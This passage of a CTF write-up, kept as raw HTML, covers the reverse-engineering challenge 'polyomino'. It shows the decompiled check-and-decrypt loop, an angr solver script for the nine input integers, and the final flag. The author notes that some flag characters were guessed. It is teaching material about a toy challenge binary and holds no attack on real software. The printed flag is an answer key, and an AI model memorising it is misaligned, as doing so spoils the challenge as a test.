class-name\">int64_t</span> rdi_3 <span class=\"token operator\">=</span> <span class=\"token operator\">-</span><span class=\"token number\">0x3c</span>\n    <span class=\"token class-name\">int32_t</span> rax_15\n    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>true<span class=\"token punctuation\">)</span>\n        <span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n        <span class=\"token class-name\">int64_t</span> rsi <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n        <span class=\"token class-name\">int64_t</span> rcx_1 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n        <span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n        <span class=\"token class-name\">uint64_t</span> rdx_1\n        <span class=\"token keyword\">do</span>\n            <span class=\"token class-name\">int64_t</span> rdx <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">)</span>\n            i <span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n            rdx_1 <span class=\"token operator\">=</span> rdx <span class=\"token operator\">*</span> rcx_1\n            rcx_1 <span class=\"token operator\">=</span> rcx_1 <span class=\"token operator\">*</span> rdi_3\n            rsi <span class=\"token operator\">=</span> rsi <span class=\"token operator\">+</span> rdx_1\n        <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>data_40a4 <span class=\"token operator\">!=</span> i<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x2c</span> <span class=\"token operator\">&amp;&amp;</span> rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x3a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token class-name\">uint64_t</span> r9_2 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">+</span> <span class=\"token number\">0x25</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">></span> <span class=\"token number\">0x36</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">&lt;=</span> <span class=\"token number\">0x36</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">not</span><span class=\"token punctuation\">(</span><span class=\"token function\">test_bit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x400c0210000001</span><span class=\"token punctuation\">,</span> r9_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n                    <span class=\"token keyword\">goto</span> label_1285\n                <span class=\"token keyword\">goto</span> label_138f\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n            label_138f<span class=\"token operator\">:</span>\n            <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token string\">\"Those aren't the right numbers. …\"</span><span class=\"token punctuation\">)</span>\n            rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n            <span class=\"token keyword\">break</span>\n        label_1285<span class=\"token operator\">:</span>\n        rdi_3 <span class=\"token operator\">=</span> rdi_3 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3 <span class=\"token operator\">==</span> <span class=\"token number\">0x3c</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>data_40a0 <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">do</span>\n                    <span class=\"token class-name\">int32_t</span> rax_4 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span>i_1\n                    i_1 <span class=\"token operator\">=</span> i_1 <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n                    <span class=\"token class-name\">int32_t</span> temp4_1\n                    <span class=\"token class-name\">int32_t</span> temp5_1\n                    temp4_1<span class=\"token operator\">:</span>temp5_1 <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rax_4<span class=\"token punctuation\">)</span>\n                    rdx_1 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>mods<span class=\"token punctuation\">.</span>dp<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token punctuation\">(</span>temp4_1<span class=\"token operator\">:</span>temp5_1<span class=\"token punctuation\">,</span> data_40a0<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>i_1 <span class=\"token operator\">-</span> <span class=\"token number\">4</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> divs<span class=\"token punctuation\">.</span>dp<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token punctuation\">(</span>temp4_1<span class=\"token operator\">:</span>temp5_1<span class=\"token punctuation\">,</span> data_40a0<span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>i_1 <span class=\"token operator\">!=</span> <span class=\"token operator\">&amp;</span>data_40a4<span class=\"token punctuation\">)</span>\n            <span class=\"token function\">__printf_chk</span><span class=\"token punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"Correct! Here's the flag: \"</span><span class=\"token punctuation\">,</span> rdx_1<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_58\n            <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> i_2 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>var_58\n            <span class=\"token class-name\">int64_t</span> var_78 <span class=\"token operator\">=</span> data_4080\n            <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> rbp_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4020\n            <span class=\"token class-name\">int64_t</span> var_70_1 <span class=\"token operator\">=</span> data_4088\n            <span class=\"token class-name\">int16_t</span> var_68_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4090<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_66_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4094<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_64_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4098<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_62_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_409c<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_60_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_40a0<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token function\">__builtin_memcpy</span><span class=\"token punctuation\">(</span>dest<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_58<span class=\"token punctuation\">,</span> src<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_78<span class=\"token punctuation\">,</span> n<span class=\"token operator\">:</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_3e\n            <span class=\"token function\">__builtin_memcpy</span><span class=\"token punctuation\">(</span>dest<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_3e<span class=\"token punctuation\">,</span> src<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_78<span class=\"token punctuation\">,</span> n<span class=\"token operator\">:</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_24\n            <span class=\"token keyword\">do</span>\n                <span class=\"token keyword\">char</span> rdi_4 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span>i_2 <span class=\"token operator\">^</span> <span class=\"token operator\">*</span>rbp_1\n                i_2 <span class=\"token operator\">=</span> i_2 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n                rbp_1 <span class=\"token operator\">=</span> rbp_1 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n                <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>i_2 <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> rdi_4\n                <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token punctuation\">(</span>rdi_4<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>var_24 <span class=\"token operator\">!=</span> i_2<span class=\"token punctuation\">)</span>\n            <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0xa</span><span class=\"token punctuation\">)</span>\n            rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n            <span class=\"token keyword\">break</span>\n    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rax <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        noreturn\n    <span class=\"token keyword\">return</span> rax_15\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The nine integers read by <code class=\"language-text\">scanf</code> are processed inside the while loop. When the <code class=\"language-text\">rdi_3</code> variable reaches <code class=\"language-text\">0x3c</code>, the flag is decrypted using the accumulated values and printed.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n<span class=\"token class-name\">int64_t</span> rsi <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n<span class=\"token class-name\">int64_t</span> rcx_1 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n<span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n<span class=\"token class-name\">uint64_t</span> rdx_1\n<span class=\"token keyword\">do</span>\n    <span class=\"token class-name\">int64_t</span> rdx <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">)</span>\n    i <span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n    rdx_1 <span class=\"token operator\">=</span> rdx <span class=\"token operator\">*</span> rcx_1\n    rcx_1 <span class=\"token operator\">=</span> rcx_1 <span class=\"token operator\">*</span> rdi_3\n    rsi <span class=\"token operator\">=</span> rsi <span class=\"token operator\">+</span> rdx_1\n<span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>data_40a4 <span class=\"token operator\">!=</span> i<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x2c</span> <span class=\"token operator\">&amp;&amp;</span> rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x3a</span><span class=\"token punctuation\">)</span>\n    <span class=\"token class-name\">uint64_t</span> r9_2 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">+</span> <span class=\"token number\">0x25</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">></span> <span class=\"token number\">0x36</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">&lt;=</span> <span class=\"token number\">0x36</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">not</span><span class=\"token punctuation\">(</span><span class=\"token function\">test_bit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x400c0210000001</span><span class=\"token punctuation\">,</span> r9_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">goto</span> label_1285\n        <span class=\"token keyword\">goto</span> label_138f\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n    label_138f<span class=\"token operator\">:</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token string\">\"Those aren't the right numbers. …\"</span><span class=\"token punctuation\">)</span>\n    rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">break</span>\nlabel_1285<span class=\"token operator\">:</span>\nrdi_3 <span class=\"token operator\">=</span> rdi_3 <span class=\"token operator\">+</span> <span class=\"token number\">1</span></code></pre></div>\n<p>Honestly, I could not fully understand the mathematical details of what the loop is doing, so I decided to look for a way to extract the flag using angr anyway. I ended up using the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> angr\n<span class=\"token keyword\">import</span> claripy\n\nproj <span class=\"token operator\">=</span> angr<span class=\"token punctuation\">.</span>Project<span class=\"token punctuation\">(</span><span class=\"token string\">'./polyomino'</span><span class=\"token punctuation\">,</span> auto_load_libs<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\nstart <span class=\"token operator\">=</span> <span class=\"token number\">0x401209</span>\nstate <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>blank_state<span class=\"token punctuation\">(</span>addr<span class=\"token operator\">=</span>start<span class=\"token punctuation\">,</span> add_options<span class=\"token operator\">=</span><span class=\"token punctuation\">{</span>angr<span class=\"token punctuation\">.</span>options<span class=\"token punctuation\">.</span>LAZY_SOLVES<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\nflag1 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag1'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag2 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag2'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag3 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag3'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag4 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag4'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag5 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag5'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag6 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag6'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag7 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag7'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag8 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag8'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag9 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag9'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404080</span><span class=\"token punctuation\">,</span> flag1<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404084</span><span class=\"token punctuation\">,</span> flag2<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404088</span><span class=\"token punctuation\">,</span> flag3<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x40408c</span><span class=\"token punctuation\">,</span> flag4<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404090</span><span class=\"token punctuation\">,</span> flag5<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404094</span><span class=\"token punctuation\">,</span> flag6<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404098</span><span class=\"token punctuation\">,</span> flag7<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x40409c</span><span class=\"token punctuation\">,</span> flag8<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x4040a0</span><span class=\"token punctuation\">,</span> flag9<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\n\nfind <span class=\"token operator\">=</span> <span class=\"token number\">0x4012bd</span>\navoids <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x401388</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x40138f</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4013b2</span><span class=\"token punctuation\">]</span>\n\nsimgr <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>simgr<span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token punctuation\">)</span>\n\nfound <span class=\"token operator\">=</span> simgr<span class=\"token punctuation\">.</span>found<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n\na <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag1<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag2<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag3<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag4<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag5<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag6<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag7<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nh <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag8<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ni <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag9<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"{} {} {} {} {} {} {} {} {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">,</span>b<span class=\"token punctuation\">,</span>c<span class=\"token punctuation\">,</span>d<span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">,</span>f<span class=\"token punctuation\">,</span>g<span class=\"token punctuation\">,</span>h<span class=\"token punctuation\">,</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver produces a different result each time, but feeding those integers into the challenge binary yields a partially incomplete flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/45662/image-20240602172955944.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.833333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAATUlEQVQI12PwMHD672ns8t9N0/G/tazFf1t5q/82cpb/7RStwbSrmv3/AH3X/16a9v9tJQ3/20gY/LcB04Zg2lbS6L+tlBGYthbX/w8ADE8f02o1XDYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/8ac56/image-20240602172955944.webp 240w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d3be9/image-20240602172955944.webp 480w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e46b2/image-20240602172955944.webp 960w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e97dc/image-20240602172955944.webp 1410w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/8ff5a/image-20240602172955944.png 240w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e85cb/image-20240602172955944.png 480w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d9199/image-20240602172955944.png 960w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/45662/image-20240602172955944.png 1410w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d9199/image-20240602172955944.png\"\n            alt=\"image-20240602172955944\"\n            title=\"image-20240602172955944\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After repeating this several times and guessing the remaining characters that never filled in, I confirmed that <code class=\"language-text\">actf{wow_you_successfully_passed_algebra_4_3bf3c5d6}</code> was the correct flag.</p>\n<h2 id=\"exampwn\" style=\"position:relative;\"><a href=\"#exampwn\" aria-label=\"exampwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" 